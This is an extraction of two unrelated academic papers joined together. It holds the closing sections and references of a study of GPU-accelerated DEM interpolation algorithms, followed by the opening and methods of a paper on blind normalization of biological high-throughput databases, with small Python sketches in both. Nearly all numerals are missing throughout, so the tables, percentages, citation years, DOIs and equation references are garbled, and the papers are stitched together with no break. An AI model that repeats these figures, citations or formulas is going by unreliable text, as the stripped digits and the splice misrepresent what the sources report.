the proportion is tknntrun × %, where tknn is the knn search time, and trun is the running time of the corresponding sequential implementations. data set original mls orthogonal mls lancaster’s mls knn rbf knn aidw knn idw knn shepard knn shepard regularly-distributed . % . % . % . % . % . % . % . % flat zone irregularly-distributed . % . % . % . % . % . % . % . % regularly-distributed . % . % . % . % . % . % . % . %rugged zone irregularly-distributed . % . % . % . % . % . % . % . % table proportion of the knn search time to the running time of the parallel implementations developed on a single gpu. the proportion is tknn trun × %, where tknn is the knn search time, and trun is the running time of the corresponding parallel implementations. data set original mls orthogonal mls lancaster’s mls knn rbf knn aidw knn idw knn shepard knn shepard regularly-distributed . % . % . % . % . % . % . % . % flat zone irregularly-distributed . % . % . % . % . % . % . % . % regularly-distributed . % . % . % . % . % . % . % . %rugged zone irregularly-distributed . % . % . % . % . % . % . % . % % of the computational time of the entire interpolation procedure for the three variations of the mls interpolation algorithm and the aidw interpolation algorithm, whereas the knn search costs less than % of the computational time for the rbf interpolation algorithm and approximately % in the other three variations of shepard’s method. it should also be noted that for the same size of data points, whether they are uniformly or nonuniformly distributed, there is no significant difference in the computational cost of the knn search; that is, the distribution pattern of data points is of weak influence on the computational efficiency of the knn search in the sequential version. as listed in table , for the parallel version developed on a single gpu, when the sizes of data points are almost the same, it would cost much more time in the knn search when the data points are nonuniformly distributed than when the data points are uniformly distributed. moreover, when the data points are nonuniformly distributed, the proportion of the knn search time to the total time is approximately % to % more than the proportion when the data points are uniformly distributed under the same conditions. on the gpu, for the same interpolation method and the same data size, the proportion of the knn search time relative to the total time when the data points are nonuniformly distributed is larger than that when the data points are uniformly distributed, and the achieved speedups are small. however, on the cpu, the proportion of knn search time when the data points are nonuniformly distributed relative to the total time is similar to that when the data points are uniformly distributed, and the achieved speedups are similar. this is because there are a large number of logical operations, such as switches in the knn search, and the gpu is inherently not as suitable for performing logical operations as the cpu. in the knn search procedure, the number of points in the search range is slightly smaller than k after determining a certain level. after the level is expanded, the number tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of points in the search range will be more than k. in this case, the k nearest neighbors should be selected and the redundant neighbors should be ignored by first sorting and then discarding. unfortunately, there are a large number of logical operations in sorting. 
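a minimal sketch of the sort-and-discard step mentioned above, assuming the candidate neighbours returned after expanding the search level have already been gathered (the underlying grid and level data structures are not reproduced here, and the function name is ours):

import numpy as np

def select_k_nearest(cand_idx, cand_dists, k):
    """keep only the k nearest of the candidates found after expanding the
    search level; the sorting here is the branch-heavy part on the gpu."""
    order = np.argsort(cand_dists)[:k]
    return cand_idx[order], cand_dists[order]

listing (sketch): discarding redundant neighbours once more than k candidates fall inside the expanded search range.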
in this procedure of sorting and discarding, when the point density is intensive in a region, the number of found nearest neighbors would be far more than the expected k, and much computational time would thus be required to sort the found neighbors. for areas with sparse data points, it takes more time to find enough k points by expanding the region level. therefore, in contrast to a uniform distribution, when the data point set is nonuniformly distributed, the knn search needs more computational time and its proportion of the total time is also greater. conclusion in this paper, we present the development of the sequential version, the parallel version on a multicore cpu, the parallel version on a many-core gpu, and the parallel version on multi-gpus for each of the eight variations of the mls, rbf, and shepard’s interpolation algorithms. we also evaluated the interpolation accuracy and computational efficiency for the above four versions of each variation when building large-scale dems. we have obtained the following observations. ( ) the distribution pattern of data points and the landscape conditions strongly influences the interpolation accuracy. the distribution pattern of data points strongly influences the interpolation efficiency, and the landscape conditions have a weak influence on the interpolation efficiency. ( ) for the same flat region, when the density of points is large, there is no obvious difference in terms of the interpolation accuracy for all interpolation methods. when the data points are uniformly distributed and the density of points is small, the order of the interpolation accuracy from high to low is: the mls interpolation algorithm, rbf, and shepard’s interpolation method. when the data points are nonuniformly distributed and the density of points is small, the order of the interpolation accuracy from high to low is: the mls interpolation algorithm, shepard’s interpolation method, and rbf. ( ) for the same rugged region, regardless of the density and distribution of the data points, the interpolation accuracy order from high to low is: the mls interpolation algorithm, rbf, and shepard’s interpolation method. when the data points are uniformly distributed, the above rules are more obvious than those when data points are nonuniformly distributed. ( ) the shepard’s interpolation method is only suitable for application in cases where the data points have smooth trends. when the data points have uniformly rugged trends, the accuracy of shepard’s interpolation method is rather unsatisfactory, especially in the case when the density of data points is small. ( ) for the same set of data points and interpolation points, the order of computational expense from high to low is: the rbf interpolation method, the mls algorithm, and shepard’s method moreover, for the same size of data points and interpolation points, the computational efficiency in the case when the data points are nonuniformly distributed is worse than when the data points are uniformly distributed. tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ( ) for the same interpolation method, the impact of knn search on the computational efficiency of the cpu versions and the gpu versions is different. specifically, the percentage of the computational time of knn search relative to the computational time of the entire interpolation procedure in the cpu versions is much smaller than in the gpu versions. 
acknowledgements the authors would like to thank the editor and reviewers for their contributions to the paper. additional information and declarations funding this research was supported by the natural science foundation of china (grant numbers and ), and the fundamental research funds for the central universities (grant numbers , , and ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: natural science foundation of china: , . fundamental research funds for the central universities: , , . competing interests gang mei is an academic editor for peerj computer science. author contributions • jingzhi tu conceived and designed the experiments, performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • guoxiang yang analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • pian qi analyzed the data, prepared figures and/or tables, and approved the final draft. • zengyu ding performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • gang mei conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the raw measurements are available in the supplementary files.
international journal of parallel programming ( ): – doi . /s - - - . ebdon d. . statistics in geography. nd edition. hoboken: blackwell publishing. ghandehari m, buttenfield bp, farmer cjq. . comparing the accuracy of esti- mated terrain elevations across spatial resolution. international journal of remote sensing : – doi . / . . . guan q, shi x, huang m, lai c. . a hybrid parallel cellular automata model for urban growth simulation over gpu/cpu heterogeneous architectures. international journal of geographical information science ( ): – doi . / . . . gumus k, sen a. . comparison of spatial interpolation methods and multi-layer neural networks for different point distributions on a digital elevation model. geodetski vestnik ( ): – doi . /geodetski-vestnik. . . - . tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /pers. . . http://dx.doi.org/ . /aoms/ http://dx.doi.org/ . /j.geomorph. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.cageo. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /cpe. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /geodetski-vestnik. . . - http://dx.doi.org/ . /peerj-cs. khairnar hd, shingare ps, kale s, ieee. . accuracy evaluation of cartosat- dem using different interpolation techniques for pune area. in: international conference on industrial instrumentation and control. – . krige dg. . a statistical approach to some basic mine valuation problems on the witwatersrand. or ( ): – . lancaster p, salkauskas k. . surfaces generated by moving least squares methods. mathematics of computation ( ): – doi . /s - - - - . lehmer dh. . mathematical methods in large-scale computing units. in: proc. of nd symp. on large-scale digital calculating machinery, vol. . – . lei w, xiong r, ma s, liang l, ieee. . gpu based fast algorithm for tanner graph based image interpolation. in: ieee international workshop on multimedia signal processing. lu gy, wong dw. . an adaptive inverse-distance weighting spatial interpolation technique. computers and geosciences ( ): – doi . /j.cageo. . . . mallet jl. . discrete modeling for natural objects. mathematical geology ( ): – doi . /bf . mei g. . evaluating the power of gpu acceleration for idw interpolation algorithm. scientific world journal : article id doi . / / . mei g, tian h. . impact of data layouts on the efficiency of gpu-accelerated idw interpolation. springerplus ( ): doi . /s - - - . mei g, xu l, xu n. . accelerating adaptive inverse distance weighting interpola- tion algorithm on a graphics processing unit. royal society open science : – doi . /rsos. . mei g, xu n, xu l. . improving gpu-accelerated adaptive idw interpolation algo- rithm using fast knn search. springerplus : doi . /s - - - . peng x, wu q, cai y, lou l, yu y, li q. . the application of radial basis function interpolation in reactor core power distribution on-line monitoring. annals of nuclear energy : – doi . /j.anucene. . . . polat n, uysal m, toprak as. . an investigation of dem generation process based on lidar data filtering, decimation, and interpolation methods for an urban area. measurement : – doi . /j.measurement. . . . powell mjd. . restart procedures for the conjugate gradient method. mathematical programming ( ): – doi . /bf . rishikeshan ca, katiyar sk, mahesh vnv, ieee. . 
detailed evaluation of dem interpolation methods in gis using dgps data. in: th international con- ference on computational intelligence and communication networks. – doi . /cicn. . . shepard d. . a two-dimensional interpolation function for irregularly-spaced data. in: proceedings of the acm national conference. – doi . / . . siu-nganlam n. . spatial interpolation methods: a review. american cartographer ( ): – doi . / . tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - - http://dx.doi.org/ . /j.cageo. . . http://dx.doi.org/ . /bf http://dx.doi.org/ . / / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /rsos. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.anucene. . . http://dx.doi.org/ . /j.measurement. . . http://dx.doi.org/ . /bf http://dx.doi.org/ . /cicn. . http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. steve jl. . linear algebra with applications. th edition. englewood cliffs: prentice hall. tan l, wan g, li f, chen x, du w. . gpu based contouring method on grid dem data. computers & geosciences : – doi . /j.cageo. . . . wang h, guan x, wu h. . a hybrid parallel spatial interpolation algorithm for massive lidar point clouds on heterogeneous cpu-gpu systems. isprs international journal of geo-information ( ): doi . /ijgi . wasza j, bauer s, hornegger j, ieee. . real-time preprocessing for dense -d range imaging on the gpu: defect interpolation, bilateral temporal averaging and guided filtering. in: ieee international conference on computer vision workshops. watson df. . computing the n-dimensional delaunay tessellation with application to voronoi polytopes. computer journal ( ): – doi . /comjnl/ . . . wu j, deng l, jeon g. . parallel constrained delaunay triangulation on the gpu. ieee transactions on industrial informatics : – doi . /tii. . . yan c, liu j, zhao g, chen c, yue t. . a high accuracy surface modeling method based on gpu accelerated multi-grid method. transactions in gis ( ): – doi . /tgis. . yan c, zhao g, yue t, chen c, liu j, li h, su n. . speeding up the high-accuracy surface modelling method with gpu. environmental earth sciences ( ): – doi . /s - - - . yin k, sun f, zhou s, zhang c. . par model sar image interpolation algorithm on gpu with cuda. iete technical review ( ): – doi . / . . . zhang g, zhu a, huang q. . a gpu-accelerated adaptive kernel density estimation approach for efficient point pattern analysis on spatial big data. international journal of geographical information science ( ): – . zhang j. . research on dem interpolation algorithm adaptability with local terrain features. in: international conference on geoinformatics. st international conference on geoinformatics. zhou g, liu x, fu s, sun z. . parallel identification and filling of depressions in raster digital elevation models. international journal of geographical information science ( ): – doi . / . . . tu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.cageo. . . http://dx.doi.org/ . /ijgi http://dx.doi.org/ . /comjnl/ . . http://dx.doi.org/ . /tii. . http://dx.doi.org/ . /tgis. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. submitted september accepted october published november corresponding author sebastian ohse, sebastian.ohse@mailbox.org academic editor shawn gomez additional information and declarations can be found on page doi . /peerj-cs. copyright ohse et al. 
distributed under creative commons cc-by . open access blind normalization of public high- throughput databases sebastian ohse , melanie boerries , ,* and hauke busch ,* institute of molecular medicine and cell research, university of freiburg, freiburg, germany german cancer consortium (dktk), german cancer research center (dkfz), heidelberg, germany institute of medical bioinformatics and systems medicine, medical center - university of freiburg, faculty of medicine, university of freiburg, freiburg, germany institute of experimental dermatology, university of lübeck, lübeck, germany * these authors contributed equally to this work. abstract the rise of high-throughput technologies in the domain of molecular and cell biology, as well as medicine, has generated an unprecedented amount of quantitative high- dimensional data. public databases at present make a wealth of this data available, but appropriate normalization is critical for meaningful analyses integrating different experiments and technologies. without such normalization, meta-analyses can be difficult to perform and the potential to address shortcomings in experimental designs, such as inadequate replicates or controls with public data, is limited. because of a lack of quantitative standards and insufficient annotation, large scale normalization across entire databases is currently limited to approaches that demand ad hoc assumptions about noise sources and the biological signal. by leveraging detectable redundancies in public databases, such as related samples and features, we show that blind normalization without constraints on noise sources and the biological signal is possible. the inherent recovery of confounding factors is formulated in the theoretical framework of com- pressed sensing and employs efficient optimization on manifolds. as public databases increase in size and offer more detectable redundancies, the proposed approach is able to scale to more complex confounding factors. in addition, the approach accounts for missing values and can incorporate spike-in controls. our work presents a systematic approach to the blind normalization of public high-throughput databases. subjects bioinformatics, data mining and machine learning keywords blind normalization, high-throughput data, compressed sensing, confounding factors introduction in the current age of biological science an unprecedented amount of quantitative high-dimensional data has been acquired and needs to be analyzed. in particular, high-throughput technologies in the domain of molecular and cell biology, as well as medicine, have led to a rise in the quantification of biological molecules that underlie fundamental cellular processes, such as gene expression, metabolic flux and protein signaling (see fig. a). these fundamental processes as a whole orchestrate and underpin the dynamics of the cell (joyce & palsson, ). most of the acquired high-throughput data and particularly transcriptome data is submitted to public databases for re-analysis and how to cite this article ohse s, boerries m, busch h. . blind normalization of public high-throughput databases. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:sebastian.ohse@mailbox.org https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. 
a b figure the rise of high-throughput technologies and associated normalization methods. (a) sub- missions of rna are based on ncbi’s gene expression omnibus (barrett et al., ), protein on ebi’s pride database (vizcaíno et al., ) and metabolite on ebi’s metabolights database (haug et al., ). notably, actual samples available are approximately an order of magnitude larger than the number of sub- missions. (b) overview of common normalization methods from unsupervised to supervised learning. full-size doi: . /peerjcs. /fig- reuse in research. hence, researchers increasingly rely on samples from public databases to address shortcomings in experimental design, such as insufficient randomization or missing replicates. in addition, high-throughput data based meta-analyses are best performed with a large number of samples, such as across entire databases and different measurement technologies, in order to obtain insights applicable beyond a specific experimental setting. thus, the development of data integration techniques is increasingly important. however, significant challenges remain. the overarching problem for data integration is that of normalization, which is becoming more apparent and limiting as the need for reuse and re-analysis of high-throughput data increases. normalization involves the attenuation of bias resulting from confounding factors affecting the measurement process. technical bias of an instrument or sample preparation procedure can be addressed by measuring identically processed quantitative standards. use of such standards is widespread in serial technologies. the further up- stream in the measurement process quantitative standards are introduced, the more potential sources of bias can be accounted for. biological bias due to non-identical cells or organisms is often addressed instead by randomization (montgomery, ). this later approach presupposes that the contrast of interest and potential bias sources are known. an overview of potential bias sources with a focus on high-throughput technologies is given by lazar et al. ( ). high-throughput technologies are challenging to normalize especially because the bias of biological molecules measured in parallel is not independent. such non-independent bias stems from molecular interactions throughout the measurement process, including sample preparation procedures and instrument settings that are dependent on the measured sample itself and its biological ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. signal. quantitative measurement standards must therefore effectively cover a vast number of possible combinations of potential signal measured. in addition, measurement process or instrument components are sometimes one-time-use, such as in the case of microarray technologies, making appropriate normalization with measurement standards unfeasible. in part for these reasons, high-throughput technologies have been designed with a focus on relative comparisons, such as fold changes, rather than absolute quantification. while a limited number of spike-in standards can account for some technical bias (lovén et al., ) sample preparation procedures that are important sources of bias, such as library preparation, protein extraction or metabolic labeling, generally happen up-stream of spike-in addition. 
bias attenuation by randomization is not generally possible, as contrasts of interest are not initially known in the exploratory analyses typically performed with high-throughput technologies. the initial experimental design establishes how quantitative measurement standards or randomization are employed in a particular experiment. however, in the case of experiments that draw on samples from public databases, the attenuation of bias must be done post hoc. attempts at such normalization have produced different methods across the spectrum of unsupervised to supervised learning (see fig. b). unsupervised approaches generally make use of ad hoc assumptions about noise sources or the biological signal, which are then leveraged in an attempt to average out bias. while early methods were concerned with simple centering and scaling (cheadle et al., ), more recent approaches assume that an appropriate scaling is obtained by scaling across features, such as through variance stabilization (huber et al., ), or by scaling across samples, such as through quantile normalization (bolstad et al., ; irizarry et al., ). the later approach is widely used but requires the assumption that the overall biological signal does not vary significantly between samples. another major drawback is that unsupervised approaches fail to exploit the wealth of information available in public high-throughput databases. semi-supervised approaches implicitly or explicitly exploit additional data to learn parameters that can then be transferred to the dataset at hand. in particular, frozen sva (parker, corrada bravo & leek, ), frozen rma (mccall et al., ) and the gene expression commons (seita et al., ) take such an approach. the later methods aim to adjust the weight and scale parameters of the measured features based on global distributions obtained by the use of additional data. however, the frozen sva method requires prior knowledge of the contrast of interest for the additional data to be of use and is therefore impractical in the case of exploratory analyses. the frozen rma approach is based on quantile normalization and thus makes equally restrictive assumptions about the biological signal. supervised approaches make use of replicate samples or prior knowledge of potential confounding factors and contrasts of interest. if the contrast of interest has replicate samples overlapping with known confounding factors, these replicates can subsequently be used to remove bias; for example, through simple centering (li & wong, ) or more complex non-linear adjustments (benito et al., ). in the case of small sample sizes, the popular empirical bayes method combat (johnson, li & rabinovic, ) can be applied. ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. however, any supervised methods is unable to detect and remove bias outside of a setting that includes replicate samples specifically designed to limit known confounding factors, or alternatively, prior knowledge of the contrast of interest. unfortunately, as annotation of high-throughput data with respect to sample information and the experimental protocol used is often insufficient and too incoherent for machine processing, supervised approaches to normalization are generally unfeasible for public databases. 
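to make the unsupervised baseline mentioned earlier in this section concrete, the following is a minimal numpy sketch of quantile normalization; ties are ignored for simplicity, the matrix is assumed to be features by samples, and the function name is ours. this is only a baseline for comparison, not the blind compressive normalization proposed in this work.

import numpy as np

def quantile_normalize(x):
    """force every sample (column) of a features-by-samples matrix to share
    the same empirical distribution (the column-wise mean quantiles)."""
    x = np.asarray(x, dtype=float)
    ranks = np.argsort(np.argsort(x, axis=0), axis=0)   # rank of each entry within its column
    reference = np.mean(np.sort(x, axis=0), axis=1)     # mean value at each rank across samples
    return reference[ranks]

listing (sketch): quantile normalization. as the text points out, this forces all samples onto one common distribution and therefore implicitly assumes that the overall biological signal does not vary much between samples, which is precisely the restriction the approach developed here tries to avoid.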
the blind compressive normalization algorithm developed here makes use of the sparsity assumption combined with the identification and use of detectable redundancies in high-throughput databases to normalize for unknown confounding factors. the sparsity assumption is the well motivated assumption that signals of interest generally lie on low dimensional manifolds (hastie, tibshirani & wainwright, ). in the framework of compressed sensing it enables blind recovery of bias and subsequent normalization of high-throughput databases from merely estimated redundancies, such as correlations in that data. compressed sensing is a recent field that studies the ability to accurately reconstruct signals of interested based on very few measurements (below the nyquist sampling rate) (candès & wakin, ). we sidestep more restrictive assumptions on the biological signal or noise sources common in unsupervised normalization approaches and do not require prior knowledge of the contrast of interest or appropriate sample annotation as required for supervised normalization approaches. for the biological or medical researcher working with high-throughput data this means that when blind compressive normalization can be successfully applied to a database that includes their samples of interest, these samples are subsequently more comparable to each other and overall to other samples in the database, as bias stemming from unknown confounding factors is attenuated. methods the challenge of normalizing large high-throughput databases is distinct from the traditional p � n problem (friedman, hastie & tibshirani, ) often encountered in high-throughput data normalization. the number of features (p) and the number of samples (n) in public high-throughput databases is currently large and on the same order of magnitude (p ≈ n). therefore, computational scalability becomes an important consideration. recent advances in the field of machine learning, based on the sparsity assumption, have shown that limited sampling of high-dimensional data is often sufficient for efficient signal recovery. for example, in the area of collaborative filtering, large low-rank matrices are routinely recovered from a small number of sampled entries (mazumder, hastie & tibshirani, ; jain, netrapalli & sanghavi, ; vandereycken, ). if confounding factors in high-throughput databases are equally amenable to the sparsity assumption, bias due to the measurement process may be recoverable from a relatively small number of measured quantitative standards. since such standards are not available or feasible to obtain post hoc, we propose instead to utilize database wide redundancies to obtain the necessary constraints that enable bias recovery and subsequent normalization. our approach begins with the assumption that there are a limited number of confounding factors that markedly affect the measurement process. thus, the bias is ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure blind recovery of bias. a database consisting of features, such as measurements of rna, pro- tein or metabolite and samples, such as different cell types under various stimuli, is observed. recovery of the underlying bias (purple) is feasible if some redundant underlying signal (orange) exists that is incoher- ent to the bias and partially detectable by observation (red). redundancies can be categorized as detectable and as weak or strong based on the correlation strength between features or samples. 
the more redundant a signal is the closer it falls on the perfect correlation line. full-size doi: . /peerjcs. /fig- modeled as a low-dimensional manifold that takes the form of low-rank matrix (see fig. ) denoted as x. this is a flexible model which can approximate arbitrarily close any underlying bias. opposed to traditional signal recovery approaches, we specifically model the bias (systematic noise) instead of the potentially complex signal. in the framework of compressed sensing the respective matrix recovery problem resulting in the recovery of x, is defined as follows (tan et al., ). definition given a linear operator a :rn×m →rp, let y=a(x)+� be a set of p measurements of an unknown rank r̂ matrix x∈rn×m and noise �. matrix recovery solves the problem of minx ∥∥y−a(x)∥∥ subject to rank(x)≤r, where p�nm and r ≥ r̂. ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the specific type of linear operator used depends on the context and is commonly defined as the frobenius inner product of x and sensing matrices {ai ∈rn×m}i= ,...,p such that yi= ∑n j= ∑m k= (ai)jkxjk. in the general case of dense sensing, for which various recovery guarantees have been established (candes & plan, ), sensing matrices ai are defined ∀j ∈{ ,...,n} and ∀k ∈{ ,...,m} as (ai)jk ∼n . however, this approach at bias recovery presupposes a measurement setup that provides constraints (e.g., prior information) about ai and yi to recover x according to definition . such prior information is typically not available, but we show that it can be indirectly obtained from an approximation of the redundancies that commonly exists in high-throughput databases (see ‘blind recovery’). but first, before focusing on the case of blind recovery, we introduce the intermediate case of k-sparse recovery of which blind recovery is an extension. k-sparse recovery several modifications to the traditional approach of matrix recovery through dense sensing exist, including row and column only or rank- based sensing matrices (wagner & zuk, ; cai & zhang, ; zhong, jain & dhillon, ). the common case of entry sensing can be seen as a special case of dense sensing (candes & plan, ) that requires additional assumptions for guaranteed recovery and knowledge of specific entries of x. it is the simplest form of k-sparse recovery, where each sensing matrix is -sparse (contains only one nonzero entry). if sufficient quantitative standards or spike-ins were available to obtain estimates at specific nonzero entries �(s ,t ) of x from high-throughput databases, then post hoc bias recovery through entry sensing would be possible, with s ∼uniform({ ,...,n}), t ∼uniform({ ,...,m}) and yi =xs t . in this case the -sparse sensing matrices ai are defined as: (ai)jk { ∼ if(j,k)=(s ,t ) = otherwise ( ) the next level of complexity of k-sparse recovery is a -sparse sensing matrix based approach, with entries �(s ,t )(s ,t ) chosen uniformly at random as before and (s ,t ) =(s ,t ). in this case the -sparse sensing matrices ai are defined as: (ai)jk { ∼n if(j,k)∈{(s ,t ),(s ,t )} = otherwise ( ) analogously as for the dense sensing approach, k-sparse recovery presupposes a measurement setup that provides prior information about ai and yi to recover x. it differs from dense sensing by the random sparsification of measurement operators (see eq. ( )). 
we use k-sparse recovery as an intermediate step to blind recovery, where inaccuracies due to the additional estimation step of blind recovery are controlled for in order to allow simple evaluation (see ‘results’). blind recovery in blind recovery we show how to estimate the necessary constraints (e.g., prior information) about ai and yi from the observed signal o (see fig. ). the -sparse ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure measurement inference process from detected redundancies to bias constraints required for recovery. in feature space a redundancy is detected. a sample b allows the characterization of d and slope σ σ . the corresponding bias constraint based on b is denoted in this new feature space, where d character- izes the offset from the origin. all bias estimates are constrained by the given curve (purple). full-size doi: . /peerjcs. /fig- sensing matrices ai and respective measurements yi are defined as: (ai)jk   = σ̂(os ∗) if(j,k)=(s ,x) = σ̂(os ∗) if(j,k)=(s ,x) = otherwise ( ) yi= σ̂(os ∗)ds −σ̂(os ∗)ds ( ) where σ̂(os ∗) and σ̂(os ∗) are estimates of the standard deviation of the corresponding rows os ∗ and os ∗ of the observed signal, respectively. specifically, the values for entries �(s ,x)(s ,x) of -sparse sensing matrices ai are determined by redundancy information, such as correlations between features and samples, which must be estimated from o. furthermore, [ds ,ds ] is the orthogonal vector from point (os x,os x) to the line crossing the origin with slope σ̂(os ∗)/σ̂(os ∗) in the space of rows os ∗ and os ∗ (see fig. ). thus, yi can be reconstructed from relative constraints encoded in the correlations of o. without specifying an absolute value for a specific entry, but by specifying a correlation between two particular features, the bias is constrained by the line which goes through point (os x,os x), given that the observed matrix is centered. since redundancies not only exist for features but also samples, the transpose of the observed signal ot and its corresponding matrix entries �t(sa,v)(sb,v) are used equivalently. thus, while s /sa and s /sb specify a correlated pair of rows/columns, x/v specifies a particular observation in the space of that correlated pair (see fig. ). with linear operator a, bias x and measurements y defined accordingly, the standard matrix recovery problem given in definition is then solved by riemannian optimization (vandereycken, ), specifically with the pymanopt implementation (townsend, koep & weichwald, ). ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. simulation we conduct a series of simulations to empirically evaluate the performance and robustness of the k-sparse recovery and blind recovery approaches. to this end a synthetic high- throughput database is generated (see data availability) by combining an underlying redundant signal s with a known low-rank bias x to be recovered. we generate the redundant signal s from a matrix normal distribution. this is a common model for high- throughput data (allen & tibshirani, ). specifically, s∼mn n×p(m,aat,bt b), where m denotes the mean matrix and both aat and bt b denote the covariance matrices describing the redundancies in feature and sample space, respectively. sampling is performed by drawing from a multivariate normal distribution n∼mn n×p( ,i,i) and transforming according to s=m+anb. 
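as a concrete illustration of the sampling scheme just described, the sketch below draws a redundant signal from a matrix normal distribution by transforming a standard normal matrix, s = m + a n b. the dimensions and the simple block structure of the factors a and b are illustrative assumptions; the actual generator (see data availability) additionally varies standard deviations per feature and sample and models missing values, as described next.

```python
import numpy as np

rng = np.random.default_rng(1)

def sample_matrix_normal(M, A, B, rng):
    """draw S ~ MN(M, A A^T, B^T B): sample a standard normal matrix N
    of the same shape as M and transform it as S = M + A N B."""
    N = rng.standard_normal(M.shape)
    return M + A @ N @ B

# illustrative block-structured redundancies: features (rows) and samples
# (columns) are correlated within blocks of 10
n, p = 60, 40
M = np.zeros((n, p))
A = np.eye(n) + 0.3 * np.kron(np.eye(n // 10), np.ones((10, 10)))  # feature-space factor
B = np.eye(p) + 0.3 * np.kron(np.eye(p // 10), np.ones((10, 10)))  # sample-space factor
S = sample_matrix_normal(M, A, B, rng)

row_cov = A @ A.T   # covariance describing feature-space redundancy
col_cov = B.T @ B   # covariance describing sample-space redundancy
```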
importantly, different features and samples have different standard deviations, which are used in the construction of the covariance matrices (in combination with random, binary, block-structured correlation matrices). ideally, the standard deviations follow a sub-gaussian distribution (candès & wakin). missing values are modeled according to missing at random (mar) or missing not at random (mnar) scenarios. the bias to be recovered is modeled as a random low-rank matrix $X=U\Sigma V^{T}$, with $\Sigma$ generated from $\operatorname{diag}(\sigma_1,\dots,\sigma_m)$. eigenvalues are denoted as σ and are sampled from uniform( , ). the matrix rank is denoted by m. eigenvectors u and v are obtained from stiefel manifolds generated by the qr decomposition of a random normal matrix (townsend, koep & weichwald). both the redundant signal s and the low-rank bias x are combined additively to yield the observed signal matrix o = x + s. the signal-to-noise ratio is kept approximately constant across bias matrices of different rank by scaling the eigenvalues of x to an appropriate noise amplitude.

figure: performance of 2-sparse and blind recovery. (a) decreasing the sparsity of the measurement operator from to -sparse shows a leveling-off effect (rank- , × ). (b) scalability of 2-sparse recovery overlaid with the model o(c r(n + m)) (wei et al.) (white dashed line); the larger the high-throughput database, the more likely the reconstruction of more complex noise structures from a small percentage of measurements (rank- ). (c, d) evaluation of the proof-of-concept for the 2-sparse case and blind recovery of bias with increasing noise complexity ( × ).

results

recovery performance

our performance evaluation starts with the case of k-sparse recovery, shown in figs. a–c and derived in ‘k-sparse recovery’. in our setup, the difference in measurement operator construction between sparse and dense sensing has little effect on performance; initial differences level off rapidly, as shown in fig. a. notably, in fig. a we observe no significant difference in performance between a -sparse and a -sparse measurement operator. the storage requirements for the dense sensing variant quickly become prohibitive (cai & zhang) and therefore we do not simulate above -sparse measurement operators. in fig. b we highlight the advantageous scaling behavior of the 2-sparse approach. this allows reconstruction of bias from a small percentage of the potential measurements of large high-throughput databases. therefore, for databases on the order of tens of thousands of features and samples, only a small fraction of the correlations needs to be considered in order to reconstruct the low-dimensional model of the bias x. thus, when estimating correlations and corresponding standard deviations from the data in the case of blind recovery, high-specificity and low-sensitivity estimators can be used; high sensitivity is not required given the overabundance of measurements, and the focus can be placed on high specificity instead. the non-perfect recovery in the top right of fig. b is likely due to convergence failure of the conjugate gradient optimizer, because of a heavily overdetermined recovery setting. it can be ameliorated by decreasing the number of considered measurements. in fig. c the performance is shown for increasingly complex bias from rank- to rank- .
the necessary measurements required for improved recovery in the case of a worst-case correlation structure (e.g., maximally , possible measurements) are feasible to obtain up to a noise complexity of rank- . in the best-case scenario (e.g., maximally , possible measurements) measurements are feasible to ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. obtain up to at least rank- . notably, recovery is performed for matrix dimensions of × and thus the scaling behavior observed in fig. b may improve performance depending on the size of the database considered. in fig. d we evaluate blind recovery performance, where as opposed to k-sparse recovery with -sparse sensing matrices, entries are not sampled from a gaussian distribution, but constructed post hoc from known or estimated correlations. for purposes of comparison with the k-sparse recovery based on -sparse sensing matrices, we force accurate estimation of correlations and corresponding standard deviations. no significant difference in performance between blind and -sparse recovery are observed for this setup, as shown in figs. c– d. thus, recovery is feasible when the redundancies obtained in feature and sample space are estimated accurately and are sufficiently incoherent with the low-rank bias x. discrepancies in perfect recovery between the bottom left of figs. 